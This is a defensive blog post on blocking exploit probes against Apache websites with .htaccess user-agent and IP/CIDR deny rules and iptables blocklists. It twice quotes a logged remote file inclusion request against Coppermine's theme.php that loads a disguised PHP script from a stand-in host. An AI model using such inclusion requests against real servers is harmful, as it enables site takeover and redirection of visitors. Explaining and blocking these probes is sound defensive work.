Protect your Apache hosted webite from Chinese exploit attacks
While reading my raw access logs I noticed that a lot of the recent exploit attacks hitting my website are coming from China and Korea. I can't say with certainty that the attacks originated in those countries, because they could be coming from compromised servers. Do you care whether an attack originated at the server that is attacking yours? Hell no! If some black hat hacker is commandeering a hundred thousand Chinese servers and using them to attack my servers I block the Chinese IP addresses since they are attacking me.
Here is a typical, recent exploit attempt, coming from a server in China. I have changed the destination URL to example.com for your safety.
218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"
If I was running a vulnerable version of the targeted "Coppermine" software, that upload attempt would have yielded a server 200 Success, instead of a 403 Forbidden response. This would have led to the exploitation of my website and hidden iframes would redirect my visitors to hostile destinations. I won't willingly allow that to happen and neither should other webmasters.
So, you ask, how do I block these Chinese servers from attacking my websites? If your websites are hosted on Apache web servers I can offer you two effective means of blocking those exploit probes. The details follow.
Blocking Chinese servers or personal computers from your websites
Several years ago I began reading the access logs for my websites and learned that hackers were targeting me with various exploit attacks. The goal of all of those attacks is to find an unpatched, vulnerable version of a PHP script that is installed on your website and inject hostile files into it, then use them to write iframe redirection codes to other files in your website. Take a look at this previously listed example
218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"
First of all, let's run a Whois lookup to see where that IP address is located.
http://whois.domaintools.com/218.246.20.221
IP Location: China China Beijing Development & Research Center Of State Council Net
inetnum: 218.246.0.0 - 218.246.31.255
Next, I Googled on the exploit path: GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR= and found many results defining this attack. Here is but one:
Coppermine Photo Gallery contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when sending a specially crafted URL request to the theme.php script using the THEME_DIR variable to specify a malicious file from a remote system as a parameter.
The next parameter lists the http destination where a text file is hosted.
http://example.com/gboard/rs/copyright.txt?
That file is really a PHP script in disguise and it is usually hosted unknowingly on somebody's compromised website. Note, that some exploit files are actually hosted on hostile servers owned by cyber criminals.
Then we come to the number 403. It signifies that this attempt was Forbidden by my server configuration. I will be showing you how to accomplish the same thing on your server, or website.
Last, the stated user agent is one commonly used by server hacking programs: "Mozilla/5.0" Another common exploit tool is named “libwww-perl/(version numbers)″
Blocking hacking attacks by user agent
The first line of defense is to block access to known hack-tool user agents. The two I have shown in this article are the most frequently used agents, but others are used from time to time. The following codes can be added to your web-root .htaccess file to block access to all files, for these hacker user agents:
Options +FollowSymLinks
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/5\.0$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/
RewriteRule .* - [F]
Protecting a dedicated, semi-dedicated, or VPS server from Chinese exploit attacks
Business and reseller hosting accounts are typically hosted on dedicated, or semi-dedicated servers. The lessee is usually expected to manage the leased server themselves, although managed hosting is usually available at a monthly cost. People renting or owning dedicated servers have technicians who manage updates, patches and firewalls.
If you manage your own web server that runs on Linux or Unix, you can apply my frequently updated Chinese iptables blocklist to your server's firewall. There is an up to date blocklist embedded on that page. You can copy and paste the list of IP addresses, in iptables format, into a Linux APF firewall, or a similar firewall. Instructions are found here for installing these firewalls and adding new rules.
If you lease a dedicated server and don't understand how to install and update the firewall ask for technical assistance from your hosting company. They usually provide firewall updates as a service to dedicated and VPS customers, for the protection of all involved.
Protecting individual websites from Chinese exploit attacks
Most private websites are hosted on shared hosting servers, where you are e-pluibus-unum - one out of many - accounts. You will not have access to the server's firewall, or the Linux operating system. You are only able to control access to your own web pages. You need to apply my Chinese .htaccess blocklist to your public web root .htaccess file.
Experienced webmasters know that server files beginning with a period are normally hidden server configuration files. These files can be made visible by configuring your FTP client with the remote mask code: -al which unhides .htaccess and other hidden server control files in the remote location browser section. Some FTP clients may have a simple checkbox to display these files. Online control panels usually include a website file browser and usually they show files beginning with a period.
Not every website comes with a .htaccess file, so, if you don't see one and hidden files are displayed, you will need to create a new .htaccess file. Or, just copy the contents of my blocklist, between the sections marked as containing the .htaccess rules and paste it into a new plain text file. Save that file as .htaccess and upload it to your website, in the public_html or equivalent directory. Be sure to immediately test your website to ensure that you haven't pasted in an uncommented character by accident, which will result in a Server 500 lockout error. .htaccess comments begin with a # sign. Directives begin with specific characters or words. Be careful when editing your .htaccess file. If you include an uncommented word that is not recognized as a legitimate command, a Server 500 will result and nobody will see your web pages until this is fixed.
Example of a good comment in a .htaccess file.
# This is a legitimate comment in .htaccessExample of a bad comment in a .htaccess file.
This comment will cause a Server 500 error because it is not preceded by a # symbol.
Using .htaccess Mod-Access to block offending IP addresses
Here is an example of the correct .htaccess terminology to deny access to the offending Chinese address that is listed throughout this article.
<Files *>
deny from 218.246.20.221
</Files>
That blocks just that one server IP address. This doesn't accomplish much when there are several million Chinese and Korean IP addresses that may be used to attack your server. Instead of listing every one of those IP addresses, I use complete ranges assigned to the ISP or hosting company, as I discover them. The format used is called a CIDR, which means Classless InterDomain Routing. Below is the CIDR that encompasses the attacker's IP address.
<Files *>
deny from 218.246.0.0/16
</Files>
Using the CIDR 218.246.0.0/16 blocks all IP addresses between 218.246.0.0 and 218.246.255.255. All (four) of my .htaccess blocklists usually list entire CIDRs, although there may be a few individual IPs included here and there. There are dozens to hundreds of CIDRs in my various blocklists. The Chinese blocklist is ever-growing as I discover new CIDRs that have been assigned to servers and ISPs in that area of the World. Many webmasters apply my blocklists to protect thir servers and websites from exploiters, hackers, spammers and scammers.
Note, that only the iptables blocklist will keep the attempted hacks from appearing in the access logs for individual websites. If you only have use of my .htaccess blocklists you will see these attacks, but they should all result in a server 403 response.
If you like this article please share it.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.